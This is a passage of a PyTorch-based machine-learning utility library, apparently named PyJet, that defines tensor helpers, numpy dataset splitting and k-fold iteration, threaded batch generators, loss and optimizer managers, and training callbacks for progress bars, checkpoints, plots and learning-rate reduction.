"""Flattens along axis 0 (# rows in == # rows out)"""
return x.view(x.size(0), -1)
def softmax(x):
    # Subtract the per-row max for numerical stability before exponentiating,
    # then normalize; keepdim=True lets the reductions broadcast against x
    # (the old explicit .expand() calls raised shape errors).
    normalized_exp = (x - x.max(1, keepdim=True)[0]).exp()
    return normalized_exp / normalized_exp.sum(1, keepdim=True).clamp(min=epsilon)
def batch_sum(x):
"""Sums a tensor long all non-batch dimensions"""
return x.sum(tuple(range(1, x.dim())))
def zero_center(x):
return x - x.mean()
def standardize(x):
std = (x.pow(2).mean() - x.mean().pow(2)).sqrt()
return zero_center(x) / std.expand(*x.size()).clamp(min=epsilon)
def from_numpy(x):
return torch.from_numpy(x).cuda() if use_cuda else torch.from_numpy(x)
def to_numpy(x):
return x.cpu().numpy() if use_cuda else x.numpy()
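# Example (sketch): round-trip a numpy array through the active device.
#   t = from_numpy(np.zeros((2, 3), dtype=np.float32))  # CUDA tensor if available
#   a = to_numpy(t)                                      # back to numpy on the CPU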
def arange(start, end=None, step=1, out=None):
if end is None:
x = torch.arange(0, start, step=step, out=out)
else:
x = torch.arange(start, end, step=step, out=out)
return x.cuda() if use_cuda else x
def rand(*sizes, out=None):
x = torch.rand(*sizes, out=out)
return x.cuda() if use_cuda else x
# use_cuda = False
FloatTensor = cudaFloatTensor if use_cuda else torch.FloatTensor
LongTensor = cudaLongTensor if use_cuda else torch.LongTensor
ByteTensor = cudaByteTensor if use_cuda else torch.ByteTensor
Tensor = FloatTensor
# Tensor fillers
zeros = cudaZeros if use_cuda else torch.zeros
ones = cudaOnes if use_cuda else torch.ones
print("PyJet is using " + ("CUDA" if use_cuda else "CPU") + ".")
### DATA ###
# TODO Create a dataset for HDF5 and Torch Tensor
# VERBOSITY = namedtuple(
# 'VERBOSITY', ['QUIET', 'NORMAL', 'VERBOSE', 'DEBUG'])(0, 1, 2, 3)
class Dataset(object):
"""
An abstract container for data designed to be passed to a model.
This container should implement create_batch. It is only necessary
to implement validation_split() if you use this module to split your
    data into a train and test set. The same goes for kfold().
# Note:
        Though not enforced, a Dataset should be treated as immutable. Once
        created, it should not be mutated in any way.
"""
def __init__(self, *args, **kwargs):
# self.verbosity = verbosity
pass
def __len__(self):
"""The length is used downstream by the generator if it is not inf."""
return float('inf')
# def log(self, statement, verbosity):
# if self.verbosity >= verbosity:
# print(statement)
def create_batch(self, *args, **kwargs):
"""
This method creates a batch of data to be sent to a model.
Returns:
A batch in the form of any type that can be cast to torch tensor
by a model (numpy, HDF5, torch tensor, etc.).
"""
raise NotImplementedError()
def flow(self,
steps_per_epoch=None,
batch_size=None,
shuffle=True,
replace=False,
seed=None):
"""
This method creates a generator for the data.
Returns:
A DatasetGenerator with settings determined by inputs to this
method that generates batches made by this dataset
"""
return DatasetGenerator(
self,
steps_per_epoch=steps_per_epoch,
batch_size=batch_size,
shuffle=shuffle,
replace=replace,
seed=seed)
def validation_split(self, split=0.2, **kwargs):
raise NotImplementedError()
def kfold(self, k, **kwargs):
raise NotImplementedError()
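# Illustrative sketch (hypothetical subclass, not part of the original code):
# a minimal in-memory Dataset over a numpy array. The generator passes a batch
# of indices to create_batch, which returns the selected rows.
class _ArrayDatasetExample(Dataset):
    def __init__(self, x):
        super(_ArrayDatasetExample, self).__init__()
        self.x = np.asarray(x)

    def __len__(self):
        return len(self.x)

    def create_batch(self, batch_indices):
        return self.x[batch_indices]
# e.g. gen = _ArrayDatasetExample(np.arange(10)).flow(batch_size=4)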
class BatchGenerator(object):
"""
    An abstract iterator to create batches for a model.
# Arguments:
steps_per_epoch -- The number of iterations in one epoch (optional)
batch_size -- The number of samples in one batch
"""
def __init__(self, steps_per_epoch=None, batch_size=None):
self.steps_per_epoch = steps_per_epoch
self.batch_size = batch_size
def __iter__(self):
return self
def __next__(self):
raise NotImplementedError()
class DatasetGenerator(BatchGenerator):
"""
An iterator to create batches for a model using a Dataset. 2 of the
following must be defined
-- The input Dataset's length
-- steps_per_epoch
-- batch_size
Also, if the Dataset's length is not defined, its create_batch method
should not take any inputs
# Arguments
dataset -- the dataset to generate from
steps_per_epoch -- The number of iterations in one epoch (optional)
batch_size -- The number of samples in one batch (optional)
shuffle -- Whether or not to shuffle the dataset before each epoch
default: True
replace -- Whether or not to sample with replacement. default: False
seed -- A seed for the random number generator (optional).
"""
def __init__(self,
dataset,
steps_per_epoch=None,
batch_size=None,
shuffle=True,
replace=False,
seed=None):
super(DatasetGenerator, self).__init__(steps_per_epoch, batch_size)
self.dataset = dataset
self.shuffle = shuffle
self.replace = replace
self.seed = seed
self.index_array = None
self.lock = threading.Lock()
# Some input checking
check = (int(self.steps_per_epoch is not None) +
int(self.batch_size is not None) +
int(len(self.dataset) != float("inf")))
if check < 2:
raise ValueError(
"2 of the following must be defined: len(dataset),"
" steps_per_epoch, and batch_size.")
# Otherwise, we're good, infer the missing info
if len(self.dataset) != float('inf'):
self.index_array = np.arange(len(self.dataset))
if self.batch_size is None:
if self.steps_per_epoch is None:
raise ValueError()
self.batch_size = int(
(len(self.dataset) + self.steps_per_epoch - 1) /
self.steps_per_epoch)
if self.steps_per_epoch is None:
self.steps_per_epoch = int(
(len(self.dataset) + self.batch_size - 1) / self.batch_size)
# Set the seed if we have one
if self.seed is not None:
np.random.seed(self.seed)
self.batch_argument_generator = self.create_batch_argument_generator()
def create_batch_argument_generator(self):
"""
This is an iterator that generates the necessary arguments needed to
create each batch. By default, it will generate indices from an index
array.
# Note:
This will raise a NotImplementedError if we don't have an index
array, since we can't generate batch indices if we don't know
what our indices are. If your dataset does not have indices,
you'll have to implement this yourself.
If you implement this yourself, note that the output must be an
iterable of all the arguments your dataset's create_batch method
needs.
"""
if self.index_array is None:
raise NotImplementedError()
while True:
# Shuffle if we need to
if self.shuffle:
np.random.shuffle(self.index_array)
for i in range(0, len(self.index_array), self.batch_size):
if self.replace:
yield (np.random.choice(self.index_array, self.batch_size,
True), )
else:
yield (self.index_array[i:i + self.batch_size], )
def __next__(self):
# This is a critical section, so we lock when we need the next indices
if self.index_array is not None:
with self.lock:
batch_arguments = next(self.batch_argument_generator)
else:
batch_arguments = tuple([])
# print("Batch Arguments: ", batch_arguments[0])
return self.dataset.create_batch(*batch_arguments)
def toggle_shuffle(self):
self.shuffle = not self.shuffle
def restart(self):
self.batch_argument_generator = self.create_batch_argument_generator()
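# Example (sketch): two of {len(dataset), steps_per_epoch, batch_size} must be
# known and the third is inferred. With a 1000-sample dataset:
#
#   gen = DatasetGenerator(dataset, batch_size=32)       # steps_per_epoch -> 32
#   gen = DatasetGenerator(dataset, steps_per_epoch=10)  # batch_size -> 100
#
# `dataset` here stands for any Dataset with a finite __len__.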
class BatchPyGenerator(BatchGenerator):
"""
A BatchGenerator that generates using a python iterator.
# Arguments:
pygen -- the python iterator from which to generate batches
steps_per_epoch -- The number of iterations in one epoch
"""
def __init__(self, pygen, steps_per_epoch):
super(BatchPyGenerator, self).__init__(steps_per_epoch)
self.pygen = pygen
def __iter__(self):
return self.pygen
def __next__(self):
return next(self.pygen)
class NpDataset(Dataset):
"""
A Dataset that is built from numpy data.
# Arguments
x -- The input data as a numpy array
y -- The target data as a numpy array (optional)
"""
# TODO define the kfold method for NpDataset
def __init__(self, x, y=None, ids=None):
super(NpDataset, self).__init__()
self.x = x
self.y = y
self.ids = ids
assert isinstance(self.x, np.ndarray), "x must be a numpy array."
if self.y is not None:
assert isinstance(self.y, np.ndarray), "y must be a numpy array " \
"or None."
if self.ids is not None:
assert isinstance(self.ids, np.ndarray), "ids must be a numpy array " \
"or None."
self.output_labels = self.has_labels
if self.has_labels:
assert len(self.x) == len(self.y), \
"Data and labels must have the same number of samples. " \
"X has {} samples and Y has {} samples.".format(len(x), len(y))
if self.has_ids:
assert len(self.x) == len(self.ids), \
"Data and ids must have the same number of samples. " \
"X has {} samples and ids has {} samples.".format(len(x), len(ids))
def __len__(self):
return len(self.x)
@property
def has_ids(self):
return self.ids is not None
@property
def has_labels(self):
return self.y is not None
def toggle_labels(self):
self.output_labels = not self.output_labels
def create_batch(self, batch_indicies):
if self.output_labels:
return self.x[batch_indicies], self.y[batch_indicies]
return self.x[batch_indicies]
@staticmethod
def get_stratified_split_indicies(split, shuffle, seed, stratify_by):
if shuffle:
if seed is not None:
np.random.seed(seed)
# Get all the unique output labels
unq_labels = np.unique(stratify_by, axis=0)
val_splits = []
train_splits = []
for unq_label in unq_labels:
# Find where the entire output label matches the unique label
if stratify_by.ndim == 1:
label_mask = stratify_by == unq_label
else:
non_batch_dims = tuple(range(1, stratify_by.ndim))
label_mask = np.all(stratify_by == unq_label,
axis=non_batch_dims)
# Get the indicies where the label matches
label_inds = np.where(label_mask)[0]
if shuffle:
np.random.shuffle(label_inds)
split_ind = int(split * len(label_inds))
val_splits.append(label_inds[:split_ind])
train_splits.append(label_inds[split_ind:])
train_split = np.concatenate(train_splits, axis=0)
val_split = np.concatenate(val_splits, axis=0)
# Shuffle one more time to get the labels shuffled
if shuffle:
np.random.shuffle(train_split)
np.random.shuffle(val_split)
return train_split, val_split
def get_split_indicies(self, split, shuffle, seed, stratified,
stratify_by):
if stratified:
if stratify_by is None:
stratify_by = self.y
assert stratify_by is not None, "Data must have labels to " \
"stratify by."
assert len(stratify_by) == len(self), "Labels to stratify by must " \
"have the same length as the dataset."
if shuffle:
if seed is not None:
np.random.seed(seed)
if stratified:
train_split, val_split = self.get_stratified_split_indicies(
split, shuffle, seed, stratify_by)
else:
# Default technique of splitting the data
split_ind = int(split * len(self))
val_split = slice(split_ind)
train_split = slice(split_ind, None)
if shuffle:
indicies = np.random.permutation(len(self))
train_split = indicies[train_split]
val_split = indicies[val_split]
return train_split, val_split
def get_kfold_indices(self, k, shuffle, seed):
if shuffle:
if seed is not None:
np.random.seed(seed)
indicies = np.random.permutation(len(self))
else:
indicies = np.arange(len(self))
for i in range(k):
split = 1.0 / k
# Default technique of splitting the data
split_start = int(i * split * len(self))
split_end = int((i + 1) * split * len(self))
# `indicies` is already permuted when shuffling, so slicing it directly
# yields disjoint train and validation folds.
val_split = indicies[split_start:split_end]
train_split_a = indicies[0:split_start]
train_split_b = indicies[split_end:]
yield np.concatenate([train_split_a, train_split_b]), val_split
def validation_split(self,
split=0.2,
shuffle=False,
seed=None,
stratified=False,
stratify_by=None):
"""
Splits the NpDataset into two smaller datasets based on the split
Args:
split (float, optional): The fraction of the dataset to make
validation. Defaults to 0.2.
shuffle (bool, optional): Whether or not to randomly sample the
validation set and train set from the parent dataset. Defaults
to False.
seed (int, optional): A seed for the random number generator.
Defaults to None.
stratified (bool, optional): Whether or not to sample the
validation set to have the same label distribution as the whole
dataset. Defaults to False.
stratify_by (np.ndarray, optional): A 1D array of additional labels
to stratify the split by. Defaults to None. If none is provided,
the dataset's own labels are used. This is useful if you want to
stratify based on some other property of the data.
Returns:
(tuple): A train dataset with (1-split) fraction of the data and a
validation dataset with split fraction of the data
Note:
Shuffling the dataset will at one point cause double the size of
the dataset to be loaded into RAM. If this is an issue, I suggest
you store your dataset on disk split up into validation and train
so you don't do this splitting in memory.
"""
train_split, val_split = self.get_split_indicies(
split, shuffle, seed, stratified, stratify_by)
train_data = self.__class__(
self.x[train_split],
y=None if not self.has_labels else self.y[train_split],
ids=None if not self.has_ids else self.ids[train_split])
val_data = self.__class__(
self.x[val_split],
y=None if not self.has_labels else self.y[val_split],
ids=None if not self.has_ids else self.ids[val_split])
return train_data, val_data
def kfold(self, k=5, shuffle=False, seed=None):
"""
An iterator that yields one fold of the kfold split of the data
# Arguments:
k -- The number of folds to use. Default: 5
shuffle -- Whether or not to randomly sample the validation set
and train set from the parent dataset. Default: False
seed -- A seed for the random number generator (optional).
# Yields
A train dataset with 1-1/k fraction of the data and a validation
dataset with 1/k fraction of the data. Each subsequent validation
set covers a different region of the dataset. The validation sets
are pairwise disjoint and their union is the entire dataset.
# Note
Shuffling the dataset will at one point cause double the size of
the dataset to be loaded into RAM. If this is an issue, I suggest
you store your dataset on disk split up into validation and train
so you don't do this splitting in memory.
"""
for train_split, val_split in self.get_kfold_indices(k, shuffle, seed):
train_data = NpDataset(
self.x[train_split],
y=None if not self.has_labels else self.y[train_split],
ids=None if not self.has_ids else self.ids[train_split])
val_data = NpDataset(
self.x[val_split],
y=None if not self.has_labels else self.y[val_split],
ids=None if not self.has_ids else self.ids[val_split])
yield train_data, val_data
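# Example (sketch): typical NpDataset usage. `x_train` and `y_train` are
# placeholders for the caller's own numpy arrays.
#
#   dataset = NpDataset(x_train, y_train)
#   train, val = dataset.validation_split(split=0.2, shuffle=True, seed=1234)
#   traingen = train.flow(batch_size=32, shuffle=True)
#   valgen = val.flow(batch_size=32, shuffle=False)
#   for fold_train, fold_val in dataset.kfold(k=5, shuffle=True, seed=1234):
#       ...  # train one model per fold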
### TRAINING ###
class GeneratorEnqueuer(BatchGenerator):
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
"""
def __init__(self, generator):
# Copy the steps per epoch and batch size if it has one
if hasattr(generator, "steps_per_epoch") and hasattr(
generator, "batch_size"):
super(GeneratorEnqueuer, self).__init__(
steps_per_epoch=generator.steps_per_epoch,
batch_size=generator.batch_size)
else:
super(GeneratorEnqueuer, self).__init__()
logging.warning(
"Input generator does not have a steps_per_epoch or batch_size "
"attribute. Continuing without them.")
self._generator = generator
self._threads = []
self._stop_event = None
self.queue = None
self.wait_time = None
def start(self, workers=1, max_q_size=10, wait_time=0.05):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_q_size: queue size (when full, threads could block on put())
wait_time: time to sleep in-between calls to put()
"""
self.wait_time = wait_time
def data_generator_task():
while not self._stop_event.is_set():
try:
if self.queue.qsize() < max_q_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
self._threads.append(
threading.Thread(target=data_generator_task))
self._threads[-1].start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
thread.join(timeout)
self._threads = []
self._stop_event = None
self.queue = None
def __next__(self):
if not self.is_running():
raise ValueError(
"Generator must be running before iterating over it")
while True:
if not self.queue.empty():
return self.queue.get()
else:
# print("Waiting...")
time.sleep(self.wait_time)
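# Example (sketch): producing batches on background threads. `traingen` stands
# for any of the batch generators defined above.
#
#   enqueuer = GeneratorEnqueuer(traingen)
#   enqueuer.start(workers=2, max_q_size=10)
#   x, y = next(enqueuer)
#   enqueuer.stop()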
class TrainingLogs(dict):
def __init__(self):
super().__init__()
self.epoch_logs = {}
self.batch_logs = {}
def on_epoch_begin(self):
self.epoch_logs = {}
self.batch_logs = {}
def log_metric(self, metric, score):
self.batch_logs[metric.__name__] = score.item()
self.epoch_logs[metric.__name__] = metric.accumulate()
def on_epoch_end(self):
for metric_name, score in self.epoch_logs.items():
self.setdefault(metric_name, []).append(score)
def log_validation_metric(self, metric):
self.epoch_logs["val_" + metric.__name__] = metric.accumulate()
class LossManager(object):
@resettable
def __init__(self):
self.__loss_names = []
self.__loss_input_dict = {}
self.__loss_weight_dict = {}
self.__loss_dict = {}
self.__verify_loss_args = True
self.__loss_scores = {}
def __len__(self):
return len(self.__loss_names)
@property
def names(self):
return list(self.__loss_names)
def _compute_single_loss(self, model, targets, name):
# Cache the score for logging
self.__loss_scores[name] = self.__loss_weight_dict[name] * \
self.__loss_dict[name](
*[getattr(model, loss_input) for loss_input
in self.__loss_input_dict[name]],
targets
)
return self.__loss_scores[name]
def verify_args(self, model):
for loss_name, loss_inputs in self.__loss_input_dict.items():
for loss_input in loss_inputs:
if not hasattr(model, loss_input):
raise AttributeError(
"Model does not have attribute {loss_input}, which"
" is an input for the loss {loss_name}".format(
loss_input=loss_input, loss_name=loss_name))
def loss(self, model, targets):
# This means we need to verify that the input arguments for the loss
# exist, and notify the user if they don't
if self.__verify_loss_args:
self.verify_args(model)
self.__verify_loss_args = False
# Compute the loss
return sum(self._compute_single_loss(model, targets, loss_name) for
loss_name in self.__loss_names)
def get_loss_score(self, name=None):
if name is None:
assert len(self.__loss_names) == 1, "Need to specify a loss name " \
"if using multiple losses."
name = self.__loss_names[0]
return self.__loss_scores[name]
def add_loss(self, loss_fn, inputs, weight=1.0, name=None):
if name is None:
name = "loss_{}".format(len(self.__loss_dict))
self.__loss_dict[name] = loss_fn
self.__loss_input_dict[name] = inputs
self.__loss_weight_dict[name] = weight
self.__loss_names.append(name)
def remove_loss(self, name=None):
if name is None:
name = self.__loss_names.pop()
else:
self.__loss_names.remove(name)
loss_fn = self.__loss_dict.pop(name)
inputs = self.__loss_input_dict.pop(name)
weight = self.__loss_weight_dict.pop(name)
return {"name": name,
"loss": loss_fn,
"inputs": inputs,
"weight": weight}
def clear_losses(self):
self.reset()
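# Example (sketch): combining two weighted losses. The model attribute names
# ("decoded", "mu", "logvar") and the `kld_loss` callable are illustrative;
# the attributes must exist on the model when the loss is evaluated and
# `kld_loss` is assumed to take (mu, logvar, targets).
#
#   manager = LossManager()
#   manager.add_loss(F.binary_cross_entropy, inputs=["decoded"],
#                    weight=1.0, name="reconstruction")
#   manager.add_loss(kld_loss, inputs=["mu", "logvar"],
#                    weight=0.1, name="kld")
#   total = manager.loss(model, targets)  # weighted sum of both losses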
class OptimizerManager(object):
@resettable
def __init__(self):
self.__optimizer_names = []
self.__optimizer_dict = {}
def __len__(self):
return len(self.__optimizer_names)
@property
def names(self):
return list(self.__optimizer_names)
@property
def optimizers(self):
return list(self.__optimizer_dict.values())
def add_optimizer(self, optimizer, name=None):
if name is None:
name = "optimizer_{}".format(len(self))
self.__optimizer_dict[name] = optimizer
self.__optimizer_names.append(name)
def remove_optimizer(self, name=None):
if name is None:
name = self.__optimizer_names.pop()
else:
self.__optimizer_names.remove(name)
optimizer = self.__optimizer_dict.pop(name)
return {"name": name,
"optimizer": optimizer}
def clear_optimizers(self):
self.reset()
### REGISTRY ###
METRICS_REGISTRY = {}
def register_metric(name, metric):
metric.__name__ = name
METRICS_REGISTRY[name] = metric
def load_metric(name):
return METRICS_REGISTRY[name]
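# Example (sketch): registering a custom metric under a string name so it can
# later be passed to fit_generator as "mse". The function below is illustrative.
#
#   def mse(y_pred, y_true):
#       return ((y_pred - y_true) ** 2).mean()
#   register_metric("mse", mse)
#   load_metric("mse")  # -> the mse function, with __name__ == "mse"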
### CALLBACKS ###
class CallbackList(object):
"""Container abstracting a list of callbacks.
# Arguments
callbacks: List of `Callback` instances.
queue_length: Queue length for keeping
running statistics over callback execution time.
"""
def __init__(self, callbacks=None, queue_length=10):
callbacks = callbacks or []
self.callbacks = [c for c in callbacks]
self.queue_length = queue_length
def append(self, callback):
self.callbacks.append(callback)
def set_params(self, params):
for callback in self.callbacks:
callback.set_params(params)
def set_model(self, model):
for callback in self.callbacks:
callback.set_model(model)
def on_epoch_begin(self, epoch, logs=None):
"""Called at the start of an epoch.
# Arguments
epoch: integer, index of epoch.
logs: dictionary of logs.
"""
logs = {} if logs is None else logs
for callback in self.callbacks:
callback.on_epoch_begin(epoch, logs=logs)
self._delta_t_batch = 0.
self._delta_ts_batch_begin = deque([], maxlen=self.queue_length)
self._delta_ts_batch_end = deque([], maxlen=self.queue_length)
def on_epoch_end(self, epoch, logs=None):
"""Called at the end of an epoch.
# Arguments
epoch: integer, index of epoch.
logs: dictionary of logs.
"""
logs = {} if logs is None else logs
for callback in self.callbacks:
callback.on_epoch_end(epoch, logs=logs)
def on_batch_begin(self, step, epoch, logs=None):
"""Called right before processing a batch.
# Arguments
step: integer, index of the batch within the current epoch.
epoch: integer, index of the current epoch.
logs: dictionary of logs.
"""
logs = {} if logs is None else logs
t_before_callbacks = time.time()
for callback in self.callbacks:
callback.on_batch_begin(step, epoch, logs=logs)
self._delta_ts_batch_begin.append(time.time() - t_before_callbacks)
delta_t_median = np.median(self._delta_ts_batch_begin)
if (self._delta_t_batch > 0.
and delta_t_median > 0.95 * self._delta_t_batch
and delta_t_median > 0.1):
warnings.warn('Method on_batch_begin() is slow compared '
'to the batch update (%f). Check your callbacks.' %
delta_t_median)
self._t_enter_batch = time.time()
def on_batch_end(self, step, epoch, logs=None):
"""Called at the end of a batch.
# Arguments
step: integer, index of the batch within the current epoch.
epoch: integer, index of the current epoch.
logs: dictionary of logs.
"""
logs = {} if logs is None else logs
if not hasattr(self, '_t_enter_batch'):
self._t_enter_batch = time.time()
self._delta_t_batch = time.time() - self._t_enter_batch
t_before_callbacks = time.time()
for callback in self.callbacks:
callback.on_batch_end(step, epoch, logs=logs)
self._delta_ts_batch_end.append(time.time() - t_before_callbacks)
delta_t_median = np.median(self._delta_ts_batch_end)
if (self._delta_t_batch > 0.
and (delta_t_median > 0.95 * self._delta_t_batch
and delta_t_median > 0.1)):
warnings.warn('Method on_batch_end() is slow compared '
'to the batch update (%f). Check your callbacks.' %
delta_t_median)
def on_train_begin(self, logs=None):
"""Called at the beginning of training.
# Arguments
logs: dictionary of logs.
"""
logs = {} if logs is None else logs
for callback in self.callbacks:
callback.on_train_begin(logs=logs)
def on_train_end(self, logs=None):
"""Called at the end of training.
# Arguments
logs: dictionary of logs.
"""
logs = {} if logs is None else logs
for callback in self.callbacks:
callback.on_train_end(logs=logs)
def __iter__(self):
return iter(self.callbacks)
class Callback(object):
"""Abstract base class used to build new callbacks.
# Properties
params: dict. Training parameters
(eg. verbosity, batch size, number of epochs...).
model: instance of the model being trained.
The `logs` dictionary that callback methods
take as argument will contain keys for quantities relevant to
the current batch or epoch.
Currently, `fit_generator` will include the loss and each tracked
metric (by name) in the `logs` it passes to its callbacks, with
`val_`-prefixed entries added after a validation run.
"""
def __init__(self):
self.validation_data = None
def set_params(self, params):
self.params = params
def set_model(self, model):
self.model = model
def on_epoch_begin(self, epoch, logs=None):
pass
def on_epoch_end(self, epoch, logs=None):
pass
def on_batch_begin(self, step, epoch, logs=None):
pass
def on_batch_end(self, step, epoch, logs=None):
pass
def on_train_begin(self, logs=None):
pass
def on_train_end(self, logs=None):
pass
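# Example (sketch): a minimal custom callback. Only the hooks you care about
# need to be overridden.
#
#   class EpochPrinter(Callback):
#       def on_epoch_end(self, epoch, logs=None):
#           print("Finished epoch %d: %s" % (epoch, logs))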
class ProgressBar(Callback):
def __init__(self, steps, epochs=0):
super(ProgressBar, self).__init__()
self.steps = steps
self.epochs = epochs
self.last_step = 0
self.progbar = None
def on_epoch_begin(self, epoch, logs=None):
if self.epochs:
print("Epoch {curr}/{total}".format(curr=epoch + 1,
total=self.epochs))
# Create a new progress bar for the epoch
self.progbar = tqdm(total=self.steps)
self.last_step = 0
# Store the logs for updating the postfix
self.epoch_logs = logs
def on_batch_end(self, step, epoch, logs=None):
self.progbar.set_postfix(self.epoch_logs)
self.progbar.update(step - self.last_step)
self.last_step = step
def on_epoch_end(self, epoch, logs=None):
self.epoch_logs = logs
self.progbar.set_postfix(logs)
# 0 because we've already finished all steps
self.progbar.update(0)
self.progbar.close()
class ModelCheckpoint(Callback):
"""Save the model after every epoch.
`filepath` can contain named formatting options,
which will be filled with the value of `epoch` and
keys in `logs` (passed in `on_epoch_end`).
For example: if `filepath` is `weights.{epoch:02d}-{val_loss:.2f}.hdf5`,
then the model checkpoints will be saved with the epoch number and
the validation loss in the filename.
# Arguments
filepath: string, path to save the model file.
monitor: quantity to monitor.
verbose: verbosity mode, 0 or 1.
save_best_only: if `save_best_only=True`,
the latest best model according to
the quantity monitored will not be overwritten.
mode: one of {auto, min, max}.
If `save_best_only=True`, the decision
to overwrite the current save file is made
based on either the maximization or the
minimization of the monitored quantity. For `val_acc`,
this should be `max`, for `val_loss` this should
be `min`, etc. In `auto` mode, the direction is
automatically inferred from the name of the monitored quantity.
period: Interval (number of epochs) between checkpoints.
"""
def __init__(self, filepath, monitor, verbose=0,
save_best_only=False,
mode='auto', period=1):
super(ModelCheckpoint, self).__init__()
self.monitor = monitor
self.verbose = verbose
self.filepath = filepath
self.save_best_only = save_best_only
self.period = period
self.epochs_since_last_save = 0
if mode not in ['auto', 'min', 'max']:
warnings.warn('ModelCheckpoint mode %s is unknown, '
'fallback to auto mode.' % (mode),
RuntimeWarning)
mode = 'auto'
if mode == 'min':
self.monitor_op = np.less
self.best = np.Inf
elif mode == 'max':
self.monitor_op = np.greater
self.best = -np.Inf
else:
if 'acc' in self.monitor or 'auc' in self.monitor or 'iou' in self.monitor or self.monitor.startswith('fmeasure'):
self.monitor_op = np.greater
self.best = -np.Inf
else:
self.monitor_op = np.less
self.best = np.Inf
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
self.epochs_since_last_save += 1
if self.epochs_since_last_save >= self.period:
self.epochs_since_last_save = 0
filepath = self.filepath.format(epoch=epoch, **logs)
if self.save_best_only:
current = logs[self.monitor]
if current is None:
warnings.warn('Can save best model only with %s available, '
'skipping.' % self.monitor, RuntimeWarning)
else:
if self.monitor_op(current, self.best):
if self.verbose > 0:
print('Epoch %05d: %s improved from %0.5f to %0.5f,'
' saving model to %s'
% (epoch, self.monitor, self.best,
current, filepath))
self.best = current
self.model.save_state(filepath)
else:
if self.verbose > 0:
print('Epoch %05d: %s did not improve' %
(epoch, self.monitor))
else:
if self.verbose > 0:
print('Epoch %05d: saving model to %s' % (epoch, filepath))
self.model.save_state(filepath)
class Plotter(Callback):
def __init__(self, monitor, scale='linear', plot_during_train=True, save_to_file=None, block_on_end=True):
super().__init__()
if plt is None:
raise ValueError("Must be able to import Matplotlib to use the Plotter.")
self.scale = scale
self.monitor = monitor
self.plot_during_train = plot_during_train
self.save_to_file = save_to_file
self.block_on_end = block_on_end
if self.plot_during_train:
plt.ion()
self.fig = plt.figure()
self.title = "{} per Epoch".format(self.monitor)
self.xlabel = "Epoch"
self.ylabel = self.monitor
self.ax = self.fig.add_subplot(111, title=self.title,
xlabel=self.xlabel, ylabel=self.ylabel)
self.ax.set_yscale(self.scale)
self.x = []
self.y_train = []
self.y_val = []
def on_train_end(self, logs=None):
if self.plot_during_train:
plt.ioff()
if self.block_on_end:
plt.show()
return
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
self.x.append(len(self.x))
self.y_train.append(logs[self.monitor])
self.y_val.append(logs["val_" + self.monitor])
self.ax.clear()
# # Set up the plot
self.fig.suptitle(self.title)
self.ax.set_yscale(self.scale)
# Actually plot
self.ax.plot(self.x, self.y_train, 'b-', self.x, self.y_val, 'g-')
self.fig.canvas.draw()
# plt.pause(0.5)
if self.save_to_file is not None:
self.fig.savefig(self.save_to_file)
return
class MetricLogger(Callback):
def __init__(self, log_fname):
super().__init__()
self.log_fname = log_fname
def on_epoch_end(self, epoch, train_logs=None, val_logs=None):
train_logs = train_logs or {}
val_logs = val_logs or {}
# Write the info to the log
with open(self.log_fname, 'a') as log_file:
print("Epoch: %s" % epoch, file=log_file)
if len(train_logs) > 0:
print("Train", file=log_file)
for metric, values in train_logs.items():
print("\t{}: {}".format(metric, values[-1]), file=log_file)
if len(val_logs) > 0:
print("Val", file=log_file)
for metric, values in val_logs.items():
print("\t{}: {}".format(metric, values[-1]), file=log_file)
print("", file=log_file)
class ReduceLROnPlateau(Callback):
"""Reduce learning rate when a metric has stopped improving.
Models often benefit from reducing the learning rate by a factor
of 2-10 once learning stagnates. This callback monitors a
quantity and if no improvement is seen for a 'patience' number
of epochs, the learning rate is reduced.
# Example
```python
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2,
patience=5, min_lr=0.001)
model.fit(X_train, Y_train, callbacks=[reduce_lr])
```
# Arguments
optimizer: the pytorch optimizer to modify
monitor: quantity to be monitored.
monitor_val: whether or not to monitor the validation quantity.
factor: factor by which the learning rate will
be reduced. new_lr = lr * factor
patience: number of epochs with no improvement
after which learning rate will be reduced.
verbose: int. 0: quiet, 1: update messages.
mode: one of {auto, min, max}. In `min` mode,
lr will be reduced when the quantity
monitored has stopped decreasing; in `max`
mode it will be reduced when the quantity
monitored has stopped increasing; in `auto`
mode, the direction is automatically inferred
from the name of the monitored quantity.
epsilon: threshold for measuring the new optimum,
to only focus on significant changes.
cooldown: number of epochs to wait before resuming
normal operation after lr has been reduced.
min_lr: lower bound on the learning rate.
"""
def __init__(self, optimizer, monitor, monitor_val=True, factor=0.1, patience=10,
verbose=0, mode='auto', epsilon=1e-4, cooldown=0, min_lr=0):
super(ReduceLROnPlateau, self).__init__()
self.optimizer = optimizer
self.monitor = monitor
self.monitor_val = monitor_val
if factor >= 1.0:
raise ValueError('ReduceLROnPlateau '
'does not support a factor >= 1.0.')
self.factor = factor
self.min_lr = min_lr
self.epsilon = epsilon
self.patience = patience
self.verbose = verbose
self.cooldown = cooldown
self.cooldown_counter = 0 # Cooldown counter.
self.wait = 0
self.best = 0
self.mode = mode
self.monitor_op = None
self._reset()
def _reset(self):
"""Resets wait counter and cooldown counter.
"""
if self.mode not in ['auto', 'min', 'max']:
warnings.warn('Learning Rate Plateau Reducing mode %s is unknown, '
'fallback to auto mode.' % (self.mode),
RuntimeWarning)
self.mode = 'auto'
if (self.mode == 'min' or
(self.mode == 'auto' and 'acc' not in self.monitor)):
self.monitor_op = lambda a, b: np.less(a, b - self.epsilon)
self.best = np.Inf
else:
self.monitor_op = lambda a, b: np.greater(a, b + self.epsilon)
self.best = -np.Inf
self.cooldown_counter = 0
self.wait = 0
def on_train_begin(self, logs=None, **kwargs):
self._reset()
def on_epoch_end(self, epoch, train_logs=None, val_logs=None):
logs = val_logs if self.monitor_val else train_logs
